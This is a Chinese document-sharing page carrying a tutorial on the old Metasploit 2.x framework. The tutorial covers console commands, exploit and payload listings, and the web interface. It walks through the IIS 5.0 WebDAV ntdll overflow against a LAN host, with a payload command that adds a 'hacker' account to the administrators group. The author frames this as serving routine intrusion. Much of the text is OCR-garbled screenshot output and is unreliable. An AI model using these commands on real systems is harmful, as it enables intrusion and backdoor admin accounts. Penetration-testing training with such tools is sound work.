欢迎来到三一文库! | 帮助中心 三一文库31doc.com 一个上传文档投稿赚钱的网站
三一文库
全部分类
  • 幼儿/小学教育>
  • 中学教育>
  • 高等教育>
  • 研究生考试>
  • 外语学习>
  • 资格/认证考试>
  • 论文>
  • IT计算机>
  • 法律/法学>
  • 建筑/环境>
  • 通信/电子>
  • 医学/心理学>
  • ImageVerifierCode 换一换
    首页 三一文库 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    Metasploit使用教程.docx

    • 资源ID:313756       资源大小:76.33KB        全文页数:15页
    • 资源格式: DOCX        下载积分:5
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录 QQ登录 微博登录
    二维码
    微信扫一扫登录
    下载资源需要5
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP免费专享
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    Metasploit使用教程.docx

    1、工具包分1.inUX/Unix版的和Windows版.考虑到大多数人都是运用的Windows系统,这甲我把Windows版的MetaSPIOit运用方法说明下.至于UnuUnix下的运用方法和Windows卜的也是大同小井,这里就不嵌外的说明自.下毂回MetaSPIoit的安装程序之后双击安装,傻瓜化的安装过程,这里就不多说了。安装完成后可以看到安装书目下多了许多文件,主要的是:Msfconsole.bat和Msfweb.bate第一个是这个工具包的限制台,其次个是这个程序的图形界面下的程序,下面我将和大家一起来领会它们的魅力!。吩咐行下运用Metasploit运行后.首先看到的是MetaSP

    2、IOit欢迎界面,我们输入“?”得到在线帮助(如图1所示):UWIcy-em32.exeI-I-IZX_1:力:zv2.177:_I一(ncfconsoleu2.1(21exploits-27pylAds)IlecatploitPraneworkhainConsoleHelp?ShowtheRinconsoleKlpcdChangoWOrkingdirectoryexitExittheconsolehelpShowthe*ainconsolehelpinfoDisplaydet*iledexploitorpAyloadinfomationquitExittheconsolereloadRelo

    3、adexploitsandpayloadssaveSvcconfIgurationtodiskt9Setaglobalenviro11fontvariableshowShowavailableploiteandpayIoacUunsetgRenoveaglobalenvironmentvariableuSelectAnploitbyversionShowconsoleursion*f5JCvrvrw17Su赧Otn可以看到里面寺.许多的吩咐,下面我将最重要的几个做简洁说明:“?”:得到帮助。ucdtt:更换当前的工作书目。“exit”:退出。“help”:得到帮助、“info”:显示当前程序的

    4、信息。“quit”:推出程序。Mreload:栽入Exploit和payloads“save”:保存当前设置“setg”:设置一个环境变量。show”:显示可用的Exploit和payloadsuse:运用一个Exploitoversion“:显示程序的版本。虽然有这么多的吩咐可是常用的也就是“show”、“info”和“use”而已,它们原委怎么运用呢?此程序集成了众多的Exploit,所以我们要先了解一下程序中究竟有那些溢出工具包,输入showExploitsw看有哪些可用的Exploit程序先(如图2所示):CW1.af,sy*tefn32A.icqfIovecMJ9c20jxchSJf

    5、Fontpsp3rs.chunkedngUa”iiS8jsiisI09JoatiiS0jrinter.overflowiisS8.uebdavJitdllinail.ldiip913rpeJk”_m63_826Rssql2M6,resolutionpoptop,c9ative_redrealserver.describe.linuxsnlM_jtttranssar1m_trans2opensanbar6_seaich_rcsultsServnnRdtR-OverflewsoUriss*d*ind.execsvnsrve.datevj*ttpdIbS-PtsetasploitFramuork1.

    6、oadedExploitsftpacheUin32ChunkedEncodingBlackicezRcalSecurezOtherISSICQParserBufferOveEXChAnge2tfRS3Y6HMPOverflowPempage38regdllChunkedEncodingIAUeWUil3.xAfferOverflewIK5.ftsiitl09.lllPOSTOverflowIIS5.0PrUtrBulfrrfIou!(5.0UebMUfitdll.dllOverflowIttail1.MPServiceBuff”OueHlovNicrosoftRPCDOOMlO306rtSSQ

    7、1.2000ResolutionOverflowPoptopNegatiVeReadOverflowRealServerDescribeBufferOverflowSaaImFr49ventRedissenblyOver!lowSaAbatrns2openOverflowSanlMir6SearchResultsBufferOverfUvSerVTFTPDMDTH0v5g*.4J7gSelarhdMMg爽露魏缪SubvertionIUteSvnseryeGyXBJlUalFTPD1.(5PASSC8C,Sa11左面显示的是溢出程序的程序名称,右面是相应的简介可以看到MetaSPloit中带的溢

    8、出程序包还是许多的,完全可以满意我们日常入侵的须要,以后我们就再也不用到存放溢出程序的文件夹中去找半天对应的程序了!知道了有什么溢出程序,但是怎么运用呢?般状况下,当我们拿到一个溢出程序后要先阅读溢出程序的帮助文件来杳看运用方法,在MetasPloit中怎样查看我们须要的溢出程序的运用方法呢?这就用到了Info吩咐。该吩咐的作用是显示溢出程序包的具体信息,比如我们想要查看uiis50,webday_ntdllM溢出工具包的运用方法,在吩咐行下输入:“inf。Exploitiis5-webday-ntd11n后得到如图3所示的回显:zr:、WlZTWE32cm1.ceCinfoexploitii

    9、sS0_webdavutdllNMcUIlS5.0WebDAUntdll.dllOuerflowersion:$Revision:1.27$getOS:Win32irriuileged:NoProvidedBy:HDHoorc(Artistic1.icense1AvailableTftrgets:Uindows28BruteForceAvailableOptions:Exploit:NaveDefaultDescriptionoptionalSS1.UseSS1.requiredRHOSTThet*retaddressrequiredRPORT89ThetargetportlPyliInfom

    10、ation:SjmcH512Auoid:13charactersDescription:ThisReferencs:http:/www.osvdb.or9/4467http:Z/www.nIc*osofC.com/tchnetcurhttpxwww.cv.nitr.0rfft*%r-4y11ufet蝴蝶:在图3中我们须要留意的是一起先的部分和AVaiIabIeOptions中的内容,起先的内容可以告知我们这个溢出程序是针对什么系统的,而AvailableOptions中的内容是我们下一步所要用到的。这里须要说明的是在输入的吩咐中的Exploit是向程序指明我们要查看的是EXPIoit的信息,当

    11、然可以查看的还有Payk)ad的信息,但Payk)ad是什么呢?其实说白了Payload就是我们平常说的ShellCode。在MetaSploit中,溢出所用的ShellCode并不像我们平常用到的溢出工具一样,Metasploit允许我们自己选择自己喜爱的ShellCode,这样就大大提高溢出的敏捷行。在吩咐行下输入44Showpayloads后可以看到可用的SheUCode列表(如图4所示):IBlQIZit/showpayloadst4sploitFraAcvork1.oadedFayloadsbsd8bindtedx84bind.iebe4x84fbidsockbsd8revrsbsd

    12、Hreurt,cMlnericCM1,。14IIMICIM1.UniarvrsHft8(biAdHa8(bifid.i1U8iftdsocklin9rvratliax8(revtrst.ie1in86rverse.iRpshellonCheestablishedconnectio4INbCktoattAckrAnd3pAuna3bellbacktoAttAckerand3pmashellbacktoattackerAnddownloadiwpurityRodiI1in86rcverse_xorConnect301x8Sbind3l8(fintlsockbackto勺4个1.istenIorco

    13、nnectionandpaunashellffSPauna%hellOnthee5131r,Ji:tm1.istenfcrconnectionndspawnashell1.ittonfrconnectionandGIMWnashellSJMWnashellontheettabliskedconnectionCoiifxctIMCktoattackerMd8M11a=HllCRfectMCktoattackerAnd8Mvna8ellRunaspecifIcCOMMndontherenotetytlenUstiftetdWcrMpertittntbindshellUstlntSshUli)cto

    14、simUtinverseshell1.itteRfrconntctionMdsMvnsh111.istenforcnntctionAndspavnashellgunaConnectConnectConnect同样,左面是ShelICOde的名字,右面是相应的简介。我们再用InfO吩咐来看一下ShellCode的具体信息,比如我们对一个叫Winexec的SheIIeOde比较感爱好,在吩咐行下输入:InfOpayloadwinexec,如图5所示。ETCWW*Tiyrtem32,cf11texewinreverte.st9.i1.Htenforconnection*tend44drUfe:vin

    15、excUersiilti8t9e:NoImISize:153FrovHedBy:NDKOOre(Artistic1.icnsIAvailableOptions:IkCgUircd:CHDThecom*and3trin9toexecuteopti9Ml:EX11FUNCExitteclttiqve:proc。”.atkreMehoscription:ExecuteanarbitraryCoIVMnd格警要金磐VrWWe1不婀皿语做同在这个对话框中须要留意的同样是开头的信息和AvailableOptions中的内容。在AvailableOptions中,我们可以看到有Required和Option

    16、al的字样,Required代表必选的意思OPtiOnaI代表是可选可不选的。在下面的具体运用中我们须要用到这里面的选项。蝴蝶:这里须嘤说明的是,以BSD开头的是针对BSD系统的ShenCode,以1.inX开头的是针对1.inUX系统的SheuCode,以CMD和WlN开头的是针对WindQWS系统。因为为不同的系统对不同的ShellCode要求是不一样的,所一在此肯定要选择合适的SheIICode才可以胜利溢出。看了这么多基本的吩咐介绍,下面我们实际溢出次看看效果!在实际的溢出中,我们要用到的是USE吩咐.这里我们仍旧以“iis50_webdav.ntdl溢出工具包为例。在吩咐行中输入us

    17、eiis50_webdav-ntdlf,后会切换到“iis50_wcbdav_ntdll”书目下。输入ShOWoptions,查看溢出工具包要求指定输入的内容。如图6所示:CWM.ytem32cmceshowoptExploitOptionsExploit:N-DefaultDescriptionoptIonalSS1.UseSS1.requiredRHOSTThetargetaddressrequiredRPORT80ThetargetportsFi192.168.1.33tRPORT80RPORT-8RRtfiis5e_jwebdvut411.WWWa3亨端像国.运S1l在MetaSPIo

    18、it中,ShenCode是可自己指定的,怎样指定呢?很简洁,依次输入输入:setpayloadwinexecsetCMDnetuserhacker123/add&netIocalgroupadministratorshacker/add第个吩咐是指定我们须要用什么样的ShellCode,但是第2个吩咐是什么意思呢?大家现在Pl过头去看看图5。发觉什么?呵呵,还记得我提到过的必选项吗?看看AVaiIabIeOPtiOnS中的CMD必选项和后面的说明。是的,这里的第2个吩附的意思就是设置必选项CMD,其实设置的CMD的内容就是我们想要执行的吩咐。至于什么吩咐那就看大家的须要了!好了最基本的设置我们

    19、已经完成,最终指明目标主机的操作系统就可以发动攻击广,输入:showtargets可以看到可供选择的操作系统类型的代表名称。接着输入:settargetO选定操作系统COK,我们确认一下,输入:Set可以看到如图9所示的回显:(:W1M,y%tr11132cxlexensfXI,showt*gCsSupportedExploitTargets0Windows2000BruteForce.fiic503,d.vt*i11settarget0tar9eC-811fgbcetRHOST:192.168.1.3PPOI11:88p9l0ad:winectarget:(911*filS0.wbd4v.f

    20、Cl11海害安案解鬻eI)?翎W网点5检查无误后就可以起先溢出r,输入:Exploit程序提示溢出起先,只不过我这次试验怎么溢出都不胜利,因为对方系统早补了这个漏洞了,这里也就不把图贴出来丢人了,见谅。图形界面下运用MetasploitMetaSPloit图形界面的运用方法和吩咐行下没有太大的区分,只不过是操作方式的不同罢r:到MetaSPIoit的安装书目下找到Msfweb.bat文件双击运行,会后程序提示执行胜利,如图】0所示:C:Wi91,、”Mem32mare【】StartingMetAgploitv2.1UebInterfAceon127.0.0.1:S5SSS.www179taMt

    21、v然后打开IE,在地址栏中输入等会后看到图U所示的IE窗口:MKmptoefr4mewrWebCenv2.lMkrM*IntcraHlthrrr文件(DMd)I9wM)XJUDGW“叁窜c。w公*j第交r一m*WdjlZ7A0g113q方货.Metasploitv2.1ExploitIndex ApacheWin32ChunkedEncoding Bldckk忙/RcaISecure/OtherISSICQParserBufferOverflow Exchange2000MS03-46HeapOverflow Frontpagefp30reg.1的丽忑的Q SarnbaFragmentReas

    22、semblyOverflowCdEhdt9rc*orvorOmqTIcw在想要运用的溢出工具包上单击鼠标左健后进入到基本设置用口,我们仍旧以iis50,webdav_ntdll为例,如图12所示:Name:IIS5.0WebDAVntdll.dllOverflowVersion:SRevision:1.27$AuthorszHDMooreArtistic1.icenseThis http:/www.osvdb.org/4467 htwww.mioroso(tecnetsecuritvbuletinMS03-007.rmx http:/www.cve.mitre.org/cgi-bin/yena

    23、me.cgi?name=CAN-2003-0109SelectPayloadfXExpIoit1.istingIMDmaiUNJ金。m一mtQ)2%ttcWV7VX(Xfi9MfiMc%MIM*jFlHfMModule:11S5.0WebDAVntdll.dllOverflowwinbindWinbin(1.StgWinbinc1.StgeUPeecwineecwinreversewinreverse-stgWinreVerSe_StgJe1.istenforconnectionandspawnashell1.istenforconnectionandspawnashell1.istenfor

    24、connectionthenuploadandexecfileExecuteanarbitrarycommandConnectbacktoattackerandspawnashellConnectbacktoattackerandspawnashell1.istenforconnection,sendaddressofGP/1.1.across,read/execInIineEggwinrever$e_stg_upexecConnectbacktoattackerandspawnashellExploit1.istingMetasp*Donatel瘤客安全娱罪www.1791?)1otn选择合

    25、适的Payload后就进入基本信息的设定界面了,如图14所示:x*om)*a?UkDAliCJII*M-JjGniJJ出他)WCTS4mSWMlgWC2F初UModule:Ub5.UWebUAVntd.dve11owRHOSTRequiredADDRhg-ThetargetaddressRPORTRequiredPORTlThetargetportSS1.OptionalB1.UseSS1.CMDRequiredDATAk”!?黑TmandSmngtoEX11FUNCOptionalDATAFS器鬻吧:子但,threadrsenAvailableTargets:GWindows2000BruteForceImHbWcI.也IiI圈客安全娱qExptoHlistingMDonateT.=.,njWww.1这里的设置和吩咐行中介绍的是基本样的,我就不做额外的说明白。都设定好后,你可以点VulnerabilityCheCk检杳看看目标系统有没有相应的漏洞,或者点1.aUnChEXPk)it进行攻击!从上面的操作可以看出MetaSPIoit的运用方法是特别简洁的,而且功能也是很强大的,对于我们口常的渗透来说是款很好用的工具。当然,你或许并不满意于软件自带的这些溢出工具,你完全可以自己向这个工具中添加任何你认为对你有用的溢出工具包。信任随着大家的努力,这个工具包可以更加完善!


    注意事项

    本文(Metasploit使用教程.docx)为本站会员(田海滨)主动上传,三一文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知三一文库(点击联系客服),我们立即给予删除!




    宁ICP备18001539号-1

    三一文库
    收起
    展开